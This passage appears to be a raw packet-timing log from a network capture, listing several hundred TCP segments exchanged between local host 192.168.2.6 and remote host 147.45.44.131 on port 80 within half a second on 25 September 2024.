                        Sep 25, 2024 14:49:33.023935080 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.023968935 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.024012089 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.025547981 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.025583029 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.025625944 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.026550055 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.026585102 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.026628017 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.027889013 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.027923107 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.027952909 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.027966022 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.028940916 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.028975964 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.028987885 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.072298050 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.131880999 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.132441044 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.132481098 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.132492065 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.133436918 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.133471966 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.133486032 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.134989023 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.135025978 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.135039091 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.136964083 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.137001991 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.137021065 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.138420105 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.138475895 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.138475895 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.140474081 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.140511990 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.140527964 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.140543938 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.140583038 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.142126083 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.142138958 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.142184973 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.142839909 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.142853022 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.142904997 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.143978119 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.143990040 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.144022942 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.144195080 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.144205093 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.144213915 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.144238949 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.144836903 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.144849062 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.144876003 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.145620108 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.145631075 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.145656109 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.146694899 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.146707058 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.146733999 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.147942066 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.147960901 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.147990942 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.149250031 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.149261951 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.149271965 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.149291039 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.149380922 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.150574923 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.150588036 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.150671005 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.152339935 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.152353048 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.152400970 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.154248953 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.154262066 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.154299974 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.155610085 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.155622005 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.155632019 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.155663013 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.157085896 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.157099962 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.157135010 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.212888956 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.227150917 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.227840900 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.227859020 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.228008032 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.229573965 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.229588985 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.229636908 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.230994940 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.231009007 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.231065035 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.232635975 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.232650042 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.232681990 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.234170914 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.234184980 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.234222889 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.235682964 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.235697031 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.235729933 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.236972094 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.236984968 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.236995935 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.237030983 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.237045050 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.238006115 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.238018036 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.238059044 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.239518881 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.239531994 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.239569902 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.240761995 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.240775108 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.240818024 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.241729021 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.241765976 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.241776943 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.241811037 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.243519068 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.243534088 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.243582010 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.245357037 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.245371103 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.245429039 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.247193098 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.247209072 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.247251034 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.249360085 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.249372959 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.249422073 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.251009941 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.251024008 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.251034975 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.251070023 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.251085997 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.253515005 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.253529072 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.253576040 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.255354881 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.255367041 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.255409956 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.258126974 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.258141041 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.258187056 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.260317087 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.260329962 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.260339975 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.260374069 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.263173103 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.263185024 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.263240099 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.265677929 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.265691042 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.265768051 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.268863916 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.268876076 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.268919945 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.271682024 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.271693945 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.271733046 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.274744987 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.274755955 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.274765015 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.274797916 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.274816990 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.277853012 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.277865887 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.277935982 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.281248093 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.281260967 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.281311989 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.283896923 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.283907890 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.284002066 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.287731886 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.287744999 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.287754059 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.287786007 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.290177107 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.290189028 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.290240049 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.293354988 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.293366909 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.293436050 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.294852972 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.294866085 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.294904947 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.338044882 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.339458942 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.339812040 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.339823961 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.339858055 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.340926886 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.340939045 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.340981960 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.343930006 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.343943119 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.343980074 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.347127914 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.347141027 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.347151041 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.347172976 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.347193003 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.348113060 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.348124981 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.348166943 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.351699114 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.351710081 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.351718903 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.351764917 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.352080107 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.352092028 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.352121115 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.354168892 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.354180098 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.354190111 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.354213953 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.354232073 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.354562998 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.354578972 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.354679108 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.356765032 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.356775045 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.356822968 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.357393026 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.357403040 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.357446909 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.358757973 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.358768940 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.358778954 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.358804941 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.359230995 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.359241962 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.359272957 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.360553980 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.360564947 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.360609055 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.361716032 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.361727953 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.361763000 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.363188982 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.363202095 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.363244057 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.364854097 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.364866018 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.364876032 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.364907980 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.364924908 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.366014004 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.366025925 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.366065979 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.366863012 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.366874933 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.366940022 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.368138075 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.368149996 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.368225098 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.371418953 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.371439934 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.371458054 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.371470928 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.371481895 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.371490002 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.371519089 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.373202085 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.373214960 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.373291969 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.374555111 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.374567986 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.374618053 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.376425028 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.376436949 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.376468897 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.379041910 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.379055023 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.379066944 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.379093885 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.379118919 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.380935907 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.380949020 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.381004095 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.383462906 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.383476019 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.383521080 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.385318041 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.385330915 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.385377884 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.386137962 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.386152029 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.386163950 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.386198044 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.387451887 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.387465000 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.387497902 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.388340950 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.388353109 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.388389111 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.389089108 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.389101982 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.389147043 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.389672041 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.389684916 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.389729977 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.390079021 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.390091896 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.390109062 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.390130997 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.390152931 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.391041040 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.391053915 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.391093969 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.391958952 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.391973019 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.392011881 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.392839909 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.392853975 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.392908096 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.393758059 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.393770933 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.393781900 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.393819094 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.395000935 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.395014048 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.395059109 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.396135092 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.396147013 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.396182060 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.397416115 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.397428989 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.397465944 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.398893118 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.398905993 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.398941994 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.400121927 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.400135040 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.400146008 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.400171995 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.400190115 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.401549101 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.401561975 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.401608944 CEST4971180192.168.2.6147.45.44.131
                        Sep 25, 2024 14:49:33.402456999 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.402470112 CEST8049711147.45.44.131192.168.2.6
                        Sep 25, 2024 14:49:33.402509928 CEST4971180192.168.2.6147.45.44.131
